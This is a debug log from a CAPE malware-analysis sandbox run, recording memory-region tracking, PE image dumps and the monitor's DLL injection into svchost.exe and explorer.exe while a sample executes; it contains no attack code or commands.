2020-03-24 09:47:19,407 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:19,407 [root] INFO: Added new process to list with pid: 2512
2020-03-24 09:47:19,407 [root] INFO: Monitor successfully loaded in process with pid 2512.
2020-03-24 09:47:19,423 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:19,687 [root] DEBUG: set_caller_info: Adding region at 0x03890000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:19,703 [root] DEBUG: Allocation: 0x003E0000 - 0x003E1000, size: 0x1000, protection: 0x40.
2020-03-24 09:47:19,720 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:19,720 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:19,734 [root] DEBUG: ProcessImageBase: EP 0x00005493 image base 0x00400000 size 0x0 entropy 7.765584e+00.
2020-03-24 09:47:19,734 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x003E0000, size: 0x1000.
2020-03-24 09:47:19,734 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x003E0000) returned 0x00000000.
2020-03-24 09:47:19,734 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-03-24 09:47:19,734 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x003E0000) -> AllocationBase 0x003E0000 RegionSize 0x4096.
2020-03-24 09:47:19,734 [root] DEBUG: AddTrackedRegion: New region at 0x003E0000 size 0x1000 added to tracked regions.
2020-03-24 09:47:19,734 [root] DEBUG: set_caller_info: Adding region at 0x003E0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:19,734 [root] DEBUG: set_caller_info: Caller at 0x003E05FF in tracked regions.
2020-03-24 09:47:19,734 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:19,766 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:19,766 [root] DEBUG: ProcessImageBase: EP 0x00005493 image base 0x00400000 size 0x0 entropy 7.765584e+00.
2020-03-24 09:47:19,766 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003E0000.
2020-03-24 09:47:19,766 [root] DEBUG: DumpPEsInRange: Scanning range 0x3e0000 - 0x3e1000.
2020-03-24 09:47:19,766 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3e0000-0x3e1000.
2020-03-24 09:47:19,782 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003E0000 - 0x003E1000.
2020-03-24 09:47:19,782 [root] DEBUG: set_caller_info: Adding region at 0x01F20000 to caller regions list (kernel32::GetSystemTime).
2020-03-24 09:47:19,782 [root] DEBUG: DumpPEsInRange: Scanning range 0x3e0000 - 0x3e1000.
2020-03-24 09:47:19,798 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3e0000-0x3e1000.
2020-03-24 09:47:19,798 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003E0000 - 0x003E1000.
2020-03-24 09:47:19,798 [root] DEBUG: DumpMemory: CAPE output file C:\aWpAMaeYY\CAPE\2512_149821213219471224232020 successfully created, size 0x1000
2020-03-24 09:47:19,798 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\2512_149821213219471224232020
2020-03-24 09:47:19,798 [root] DEBUG: DumpRegion: Dumped stack region from 0x003E0000, size 0x1000.
2020-03-24 09:47:19,812 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003E0000.
2020-03-24 09:47:19,812 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3e0000 - 0x3e1000.
2020-03-24 09:47:19,812 [root] DEBUG: DumpMemory: CAPE output file C:\aWpAMaeYY\CAPE\2512_10990107219471224232020 successfully created, size 0x1000
2020-03-24 09:47:19,828 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\2512_10990107219471224232020
2020-03-24 09:47:19,828 [root] DEBUG: DumpRegion: Dumped stack region from 0x003E0000, size 0x1000.
2020-03-24 09:47:19,828 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003E0000.
2020-03-24 09:47:19,828 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3e0000 - 0x3e1000.
2020-03-24 09:47:19,844 [root] DEBUG: ProtectionHandler: Address 0x00401000 already in tracked region at 0x00400000, size 0x1000
2020-03-24 09:47:19,844 [root] DEBUG: ProtectionHandler: Address: 0x00401000 (alloc base 0x00400000), NumberOfBytesToProtect: 0x6000, NewAccessProtection: 0x20
2020-03-24 09:47:19,844 [root] DEBUG: ProtectionHandler: Increased region size at 0x00401000 to 0x7000.
2020-03-24 09:47:19,844 [root] DEBUG: ProtectionHandler: Updated region protection at 0x00401000 to 0x20.
2020-03-24 09:47:19,844 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.796518e+00.
2020-03-24 09:47:19,859 [root] DEBUG: ProcessImageBase: Modified entry point (0x000010E7) detected at image base 0x00400000 - dumping.
2020-03-24 09:47:19,859 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:19,875 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:19,875 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:19,875 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\2512_6876345841947924232020
2020-03-24 09:47:19,875 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8a00.
2020-03-24 09:47:19,891 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:19,891 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:19,891 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:19,891 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:19,891 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:47,144 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:47:47,176 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2152
2020-03-24 09:47:47,190 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:47,190 [lib.api.process] INFO: 64-bit DLL to inject is C:\ejkbjgk\dll\uFWbznX.dll, loader C:\ejkbjgk\bin\AxXfKPwL.exe
2020-03-24 09:47:47,190 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:47,190 [root] DEBUG: Loader: Injecting process 2152 (thread 716) with C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,190 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:47:47,190 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,207 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:47,221 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,221 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2152
2020-03-24 09:47:47,221 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:47,221 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2152
2020-03-24 09:47:47,221 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:47,221 [lib.api.process] INFO: 64-bit DLL to inject is C:\ejkbjgk\dll\uFWbznX.dll, loader C:\ejkbjgk\bin\AxXfKPwL.exe
2020-03-24 09:47:47,237 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:47,237 [root] DEBUG: Loader: Injecting process 2152 (thread 716) with C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,237 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:47:47,253 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,253 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:47,253 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,253 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2152
2020-03-24 09:47:47,299 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:47,299 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:47,315 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:47,346 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:47:47,362 [root] WARNING: Unable to hook LockResource
2020-03-24 09:47:47,378 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:47,378 [root] DEBUG: Debugger initialised.
2020-03-24 09:47:47,378 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 2152 at 0x00000000743F0000, image base 0x00000000FFA10000, stack from 0x00000000000F5000-0x0000000000100000
2020-03-24 09:47:47,378 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2020-03-24 09:47:47,394 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00000000FFA10000) returned 0x0000000000000000.
2020-03-24 09:47:47,394 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:47:47,394 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2152
2020-03-24 09:47:47,394 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00000000FFA10000) -> AllocationBase 0x00000000FFA10000 RegionSize 0x4096.
2020-03-24 09:47:47,394 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:47,394 [lib.api.process] INFO: 64-bit DLL to inject is C:\ejkbjgk\dll\uFWbznX.dll, loader C:\ejkbjgk\bin\AxXfKPwL.exe
2020-03-24 09:47:47,394 [root] DEBUG: AddTrackedRegion: EntryPoint 0x246c, Entropy 3.648168e+00
2020-03-24 09:47:47,394 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:47:47,394 [root] DEBUG: AddTrackedRegion: New region at 0x00000000FFA10000 size 0x1000 added to tracked regions.
2020-03-24 09:47:47,394 [root] DEBUG: Loader: Injecting process 2152 (thread 716) with C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,394 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:47:47,394 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:47:47,394 [root] INFO: Added new process to list with pid: 2152
2020-03-24 09:47:47,394 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:47:47,394 [root] INFO: Monitor successfully loaded in process with pid 2152.
2020-03-24 09:47:47,394 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:47:47,487 [root] DEBUG: set_caller_info: Adding region at 0x0000000000190000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:47:47,487 [root] DEBUG: DLL loaded at 0x00000000003E0000: C:\ejkbjgk\dll\uFWbznX (0xe5000 bytes).
2020-03-24 09:47:47,533 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:47:47,533 [root] DEBUG: DLL unloaded from 0x00000000003E0000.
2020-03-24 09:47:47,533 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2020-03-24 09:47:47,581 [root] DEBUG: InjectDll: DLL injection via thread failed.
2020-03-24 09:47:47,628 [root] DEBUG: Failed to inject DLL C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:47:47,674 [lib.api.process] ERROR: Unable to inject into 64-bit process with pid 2152, error: -8
2020-03-24 09:47:47,690 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2020-03-24 09:47:47,706 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2512).
2020-03-24 09:47:47,706 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:47,706 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:47,706 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.679172e+00.
2020-03-24 09:47:47,706 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003E0000.
2020-03-24 09:47:47,706 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x407000.
2020-03-24 09:47:47,706 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-03-24 09:47:47,706 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:47,706 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:47,706 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:47,706 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x407000.
2020-03-24 09:47:47,721 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-03-24 09:47:47,721 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:47:47,721 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:47,721 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:47,736 [root] DEBUG: set_caller_info: Adding region at 0x0000000000080000 to caller regions list (ntdll::NtProtectVirtualMemory).
2020-03-24 09:47:47,736 [root] DEBUG: set_caller_info: Adding region at 0x0000000037610000 to caller regions list (kernel32::HeapCreate).
2020-03-24 09:47:47,736 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\2512_7249358587481224232020
2020-03-24 09:47:47,753 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:47,753 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x407000.
2020-03-24 09:47:47,753 [root] DEBUG: set_caller_info: Adding region at 0x00000000001E0000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:47:47,753 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x00407000.
2020-03-24 09:47:47,753 [root] DEBUG: set_caller_info: Adding region at 0x0000000003A00000 to caller regions list (ntdll::NtClose).
2020-03-24 09:47:47,753 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x00407000.
2020-03-24 09:47:47,753 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x407000.
2020-03-24 09:47:47,753 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\2512_13878551857481224232020
2020-03-24 09:47:47,753 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:47,767 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x407000.
2020-03-24 09:47:47,767 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x00407000.
2020-03-24 09:47:47,767 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x00407000.
2020-03-24 09:47:47,767 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x407000.
2020-03-24 09:47:47,767 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:47:47,767 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2512).
2020-03-24 09:47:47,767 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:47,767 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-03-24 09:47:47,767 [root] DEBUG: ProcessImageBase: EP 0x000010E7 image base 0x00400000 size 0x0 entropy 7.679172e+00.
2020-03-24 09:47:47,767 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003E0000.
2020-03-24 09:47:47,767 [root] INFO: Notified of termination of process with pid 2512.
2020-03-24 09:47:47,783 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 992).
2020-03-24 09:47:47,783 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:47,783 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x4A310000.
2020-03-24 09:47:47,783 [root] DEBUG: ProcessImageBase: EP 0x0000829A image base 0x4A310000 size 0x0 entropy 4.501519e+00.
2020-03-24 09:47:47,783 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:47:47,799 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 992).
2020-03-24 09:47:47,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:47,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x4A310000.
2020-03-24 09:47:47,799 [root] DEBUG: ProcessImageBase: EP 0x0000829A image base 0x4A310000 size 0x0 entropy 4.501519e+00.
2020-03-24 09:47:47,799 [root] INFO: Notified of termination of process with pid 992.
2020-03-24 09:47:47,799 [root] DEBUG: set_caller_info: Adding region at 0x0000000002150000 to caller regions list (advapi32::RegCloseKey).
2020-03-24 09:47:47,815 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2872).
2020-03-24 09:47:47,815 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:47:47,815 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:47,815 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x4A310000.
2020-03-24 09:47:47,815 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:47:47,831 [root] DEBUG: ProcessImageBase: EP 0x0000829A image base 0x4A310000 size 0x0 entropy 4.511851e+00.
2020-03-24 09:47:47,831 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:47:47,831 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2872).
2020-03-24 09:47:47,831 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-03-24 09:47:47,831 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x4A310000.
2020-03-24 09:47:47,831 [root] DEBUG: ProcessImageBase: EP 0x0000829A image base 0x4A310000 size 0x0 entropy 4.511851e+00.
2020-03-24 09:47:47,831 [root] INFO: Notified of termination of process with pid 2872.
2020-03-24 09:47:47,845 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2020-03-24 09:47:47,845 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2020-03-24 09:47:47,861 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:47:47,861 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2020-03-24 09:47:47,878 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2020-03-24 09:47:47,878 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2020-03-24 09:47:47,892 [root] DEBUG: DLL loaded at 0x000007FEFC890000: C:\Windows\system32\mswsock (0x55000 bytes).
2020-03-24 09:47:47,892 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:47:47,908 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:47:47,908 [root] DEBUG: DLL loaded at 0x000007FEFC710000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2020-03-24 09:47:47,924 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2020-03-24 09:47:47,924 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2020-03-24 09:47:47,956 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:47:48,486 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:47:50,670 [root] DEBUG: DLL loaded at 0x000007FEFC680000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:47:50,670 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2020-03-24 09:47:50,670 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2020-03-24 09:47:52,385 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2020-03-24 09:47:52,401 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:47:52,401 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:47:52,401 [root] DEBUG: DLL loaded at 0x000007FEFC530000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:47:52,417 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2020-03-24 09:47:52,417 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2020-03-24 09:47:52,463 [root] DEBUG: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\GPAPI (0x1b000 bytes).
2020-03-24 09:47:52,494 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\cryptbase (0xf000 bytes).
2020-03-24 09:47:52,510 [root] DEBUG: DLL loaded at 0x000007FEF4FC0000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:47:52,510 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2020-03-24 09:47:52,526 [root] DEBUG: DLL loaded at 0x000007FEFBA20000: C:\Windows\system32\SensApi (0x9000 bytes).
2020-03-24 09:47:52,588 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:47:52,588 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:47:52,588 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:47:52,604 [root] DEBUG: DLL loaded at 0x000007FEF44E0000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:47:52,619 [root] DEBUG: DLL loaded at 0x000007FEFC3D0000: C:\Windows\system32\DEVRTL (0x12000 bytes).
2020-03-24 09:47:52,651 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:47:52,667 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-03-24 09:47:52,667 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2020-03-24 09:47:52,681 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:47:52,697 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:47:52,697 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:47:52,729 [root] DEBUG: DLL loaded at 0x000007FEFAD90000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2020-03-24 09:47:52,744 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2020-03-24 09:47:52,744 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:47:52,759 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:47:52,759 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:47:52,776 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:47:52,792 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:47:54,803 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2020-03-24 09:47:54,835 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:47:54,835 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:47:54,865 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:47:57,799 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:47:57,815 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:47:57,815 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:47:57,815 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:47:59,171 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2020-03-24 09:47:59,171 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:47:59,187 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:47:59,203 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:47:59,233 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:47:59,233 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:47:59,233 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:47:59,250 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:47:59,733 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2020-03-24 09:47:59,733 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:47:59,749 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:47:59,765 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:48:00,622 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2020-03-24 09:48:00,622 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:48:00,622 [lib.api.process] INFO: 64-bit DLL to inject is C:\ejkbjgk\dll\uFWbznX.dll, loader C:\ejkbjgk\bin\AxXfKPwL.exe
2020-03-24 09:48:00,622 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\EqkKvCpskh.
2020-03-24 09:48:00,638 [root] DEBUG: Loader: Injecting process 1632 (thread 2720) with C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:48:00,638 [root] DEBUG: Process image base: 0x00000000FF900000
2020-03-24 09:48:00,638 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:48:00,638 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:48:00,638 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:48:00,638 [root] DEBUG: Process dumps disabled.
2020-03-24 09:48:00,638 [root] INFO: Disabling sleep skipping.
2020-03-24 09:48:00,654 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:48:00,654 [root] WARNING: Unable to hook LockResource
2020-03-24 09:48:00,700 [root] DEBUG: Debugger initialised.
2020-03-24 09:48:00,700 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 1632 at 0x00000000743F0000, image base 0x00000000FF900000, stack from 0x0000000006CE2000-0x0000000006CF0000
2020-03-24 09:48:00,700 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2020-03-24 09:48:00,700 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00000000FF900000) returned 0x0000000000000000.
2020-03-24 09:48:00,700 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:00,700 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00000000FF900000) -> AllocationBase 0x00000000FF900000 RegionSize 0x4096.
